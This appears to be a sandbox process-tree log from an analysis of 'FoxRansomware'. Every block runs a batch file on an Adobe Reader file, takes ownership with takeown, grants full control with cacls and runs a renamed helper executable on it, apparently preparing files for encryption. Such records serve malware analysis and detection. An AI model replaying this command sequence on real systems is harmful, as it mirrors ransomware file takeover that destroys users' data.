C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "reviews_sent.gif" -nobanner4⤵PID:5200
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""2⤵PID:5176
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C3⤵PID:5272
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"3⤵PID:5292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "stop_collection_data.gif" -nobanner3⤵PID:5288
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "stop_collection_data.gif" -nobanner4⤵PID:5308
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""2⤵PID:5344
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C3⤵PID:5364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"3⤵PID:5380
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "ReadMe.htm" -nobanner3⤵PID:5384
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "ReadMe.htm" -nobanner4⤵PID:5388
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5456
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""2⤵PID:6720
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C3⤵PID:5420
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"3⤵PID:5448
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "MinionPro-It.otf" -nobanner3⤵PID:5464
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "MinionPro-It.otf" -nobanner4⤵PID:5432
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5496
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""2⤵PID:5592
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C3⤵PID:5632
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"3⤵PID:5648
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "ZX______.PFB" -nobanner3⤵PID:5212
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "ZX______.PFB" -nobanner4⤵PID:5660
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5564
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""2⤵PID:5684
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C3⤵PID:5724
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"3⤵PID:6924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "brt04.hsp" -nobanner3⤵PID:5764
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "brt04.hsp" -nobanner4⤵PID:6908
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6916
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""2⤵PID:6900
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C3⤵PID:6980
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"3⤵
- Modifies file permissions
PID:6964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "engphon.env" -nobanner3⤵PID:6960
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "engphon.env" -nobanner4⤵PID:6988
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7016
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""2⤵PID:7060
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C3⤵PID:5888
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"3⤵PID:7048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "CORPCHAR.TXT" -nobanner3⤵PID:5756
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "CORPCHAR.TXT" -nobanner4⤵PID:5732
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5784
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""2⤵PID:5864
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C3⤵PID:5664
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"3⤵PID:5900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "CP1250.TXT" -nobanner3⤵PID:5944
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "CP1250.TXT" -nobanner4⤵PID:5948
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6932
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""2⤵PID:6012
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C3⤵PID:5940
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"3⤵PID:5692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "MyriadCAD.otf" -nobanner3⤵PID:6024
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "MyriadCAD.otf" -nobanner4⤵PID:6092
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6100
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""2⤵PID:6796
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C3⤵PID:2668
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"3⤵
- Modifies file permissions
PID:6140
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "create_form.gif" -nobanner3⤵PID:7136
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "create_form.gif" -nobanner4⤵PID:1484
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""2⤵PID:6016
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C3⤵PID:6000
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"3⤵PID:7112
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "info.gif" -nobanner3⤵PID:5860
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "info.gif" -nobanner4⤵PID:5828
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2916
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""2⤵PID:7052
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C3⤵PID:6056
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"3⤵
- Modifies file permissions
PID:6048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "review_same_reviewers.gif" -nobanner3⤵PID:6164
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "review_same_reviewers.gif" -nobanner4⤵PID:6156
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1552
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""2⤵PID:6208
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C3⤵PID:6984
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"3⤵PID:7092
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "trash.gif" -nobanner3⤵PID:6224
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "trash.gif" -nobanner4⤵PID:6232
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6300
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""2⤵PID:220
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C3⤵PID:5512
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"3⤵PID:6340
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "CourierStd-Bold.otf" -nobanner3⤵PID:6316
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "CourierStd-Bold.otf" -nobanner4⤵PID:6376
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3256
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""2⤵PID:6248
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C3⤵PID:6336
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"3⤵PID:6452
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "MyriadPro-It.otf" -nobanner3⤵PID:6400
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "MyriadPro-It.otf" -nobanner4⤵PID:1444
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6504
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""2⤵PID:6564
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C3⤵PID:6344
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"3⤵PID:6508
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner3⤵PID:6552
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner4⤵PID:1336
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1496
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""2⤵PID:6596
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C3⤵PID:6652
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"3⤵PID:6548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "can.hyp" -nobanner3⤵PID:2268
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "can.hyp" -nobanner4⤵PID:6624
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6576
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""2⤵PID:6940
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C3⤵PID:6716
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"3⤵PID:2012
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "usa37.hyp" -nobanner3⤵PID:6360
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "usa37.hyp" -nobanner4⤵PID:6744
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""2⤵PID:6768
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C3⤵PID:1188
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"3⤵PID:1716
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "ICELAND.TXT" -nobanner3⤵PID:6772
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "ICELAND.TXT" -nobanner4⤵PID:6620
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6840
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""2⤵PID:2044
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C3⤵PID:2376
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"3⤵PID:6788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "CP1254.TXT" -nobanner3⤵PID:1420
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "CP1254.TXT" -nobanner4⤵PID:7064
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2364
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""2⤵PID:112
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C3⤵PID:1284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"3⤵PID:1820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "email_all.gif" -nobanner3⤵PID:784
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "email_all.gif" -nobanner4⤵PID:1304
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1748
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""2⤵PID:644
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C3⤵PID:2632
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"3⤵PID:604
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "open_original_form.gif" -nobanner3⤵PID:2876
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "open_original_form.gif" -nobanner4⤵PID:808
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""2⤵PID:1976
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C3⤵PID:1720
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"3⤵PID:2728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "rss.gif" -nobanner3⤵PID:904
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "rss.gif" -nobanner4⤵PID:652
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1476
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""2⤵PID:1100
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C3⤵PID:1824
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"3⤵PID:1116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "turnOffNotificationInTray.gif" -nobanner3⤵PID:2424
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "turnOffNotificationInTray.gif" -nobanner4⤵PID:2944
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:712
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""2⤵PID:2868
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C3⤵PID:1448
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"3⤵
- Modifies file permissions
PID:5416
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "CourierStd-Oblique.otf" -nobanner3⤵PID:1252
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "CourierStd-Oblique.otf" -nobanner4⤵PID:1480
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2276
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""2⤵PID:1952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C3⤵PID:2420
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"3⤵PID:2436
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "SY______.PFM" -nobanner3⤵PID:2104
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "SY______.PFM" -nobanner4⤵PID:964
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:564
-
-
-
